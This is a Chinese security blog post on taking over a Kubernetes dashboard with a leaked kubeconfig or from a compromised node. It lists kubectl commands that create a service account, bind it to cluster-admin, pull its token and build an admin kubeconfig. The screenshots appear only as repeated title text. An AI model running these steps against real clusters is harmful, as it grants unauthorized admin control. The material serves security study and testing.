k8s命令行工具(k8s configmap subpath)

文章前言

本篇文章我们主要介绍以下两种利用场景下如何通过kubeconfig来接管Kubernet dashboard

  • 利用场景1:项目托管不当导致kubernetconfig文件泄露,例如:Github、Gitlab等,之后接管Kubernet dashboard

  • 利用场景2:在获取到Node节点权限的情况下通过kubeconfig来接管Kubernet dashboard

基础知识

用户凭证保存在kubeconfig文件中,kubectl通过以下顺序来找到kubeconfig文件

  • 如果提供了–kubeconfig参数,就使用提供的kubeconfig文件

  • 如果未提供–kubeconfig参数,但设置了环境变量$KUBECONFIG,则使用该环境变量提供的kubeconfig文件

  • 如果以上两种情况都没有,那么kubectl就使用默认的kubeconfig文件$HOME/.kube/config

利用流程

Step 1:获取namespace

kubectl get namespace

Step 2:创建dashboard管理用户

kubectl create serviceaccount dashboard-admin -n kubernetes-dashboard

k8s命令行工具(k8s configmap subpath)

Step 3:绑定用户为集群管理用户

kubectl create clusterrolebinding dashboard-cluster-admin --clusterrole=cluster-admin --serviceaccount=kubernetes-dashboard:dashboard-admin

k8s命令行工具(k8s configmap subpath)

Step 4:获取tocken(后续可以使用token登录)

    kubectl get sa,secrets -n kubernetes-dashboard
    kubectl describe secret -n kubernetes-dashboard dashboard-admin-token-kqsll

    k8s命令行工具(k8s configmap subpath)

    k8s命令行工具(k8s configmap subpath)

    Step 5:生成kubeconfig文件

    DASH_TOCKEN=$(kubectl get secret -n kubernetes-dashboard dashboard-admin-token-kqsll -o jsonpath={.data.token}|base64 -d)

    k8s命令行工具(k8s configmap subpath)

    kubectl config set-cluster kubernetes --server=192.168.17.144:30001 --kubeconfig=/home/r00t/dashbord-admin.confkubectl config set-credentials dashboard-admin --token=$DASH_TOCKEN --kubeconfig=/home/r00t/dashbord-admin.confkubectl config set-context dashboard-admin@kubernetes --cluster=kubernetes --user=dashboard-admin --kubeconfig=/home/r00t/dashbord-admin.confkubectl config use-context dashboard-admin@kubernetes --kubeconfig=/home/r00t/dashbord-admin.conf

    k8s命令行工具(k8s configmap subpath)

    Step 6:赋予读写执行权限

    chmod 777 dashboard-admin.conf

    k8s命令行工具(k8s configmap subpath)

    Step 7:使用生成的dashbord-admin.conf登录dashboard

    k8s命令行工具(k8s configmap subpath)

    k8s命令行工具(k8s configmap subpath)

    相关扩展

    上面的我们是在master节点下创建管理账户并获取其配置文件来访问的Dashboard,下面我们介绍一下如何通过修改默认的配置文件来实现对Dashboard的访问

    Step 1:获取环境变量

    evn

    k8s命令行工具(k8s configmap subpath)

    Step 2:复制一份到桌面文件

    k8s命令行工具(k8s configmap subpath)

    Step 3:获取token信息

      kubectl get sa,secrets -n kubernetes-dashboard
      kubectl describe secret -n kubernetes-dashboard default-token-6lf6k

      k8s命令行工具(k8s configmap subpath)

      Step 7:修改config.conf添加下面的token部分

      k8s命令行工具(k8s configmap subpath)

      Step 8:使用token访问dashboard,可以看到是低权限用户,故而还是需要自我去构建才好,或者是用户在启动dashboard的时候有指定config那么可以直接复制config并修改其内容实现

      原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34242.html

      (0)
      七芒星实验室's avatar七芒星实验室
      上一篇 2024年4月16日 上午8:39
      下一篇 2024年4月16日 上午8:41

      相关推荐

      发表回复

      您的邮箱地址不会被公开。 必填项已用 * 标注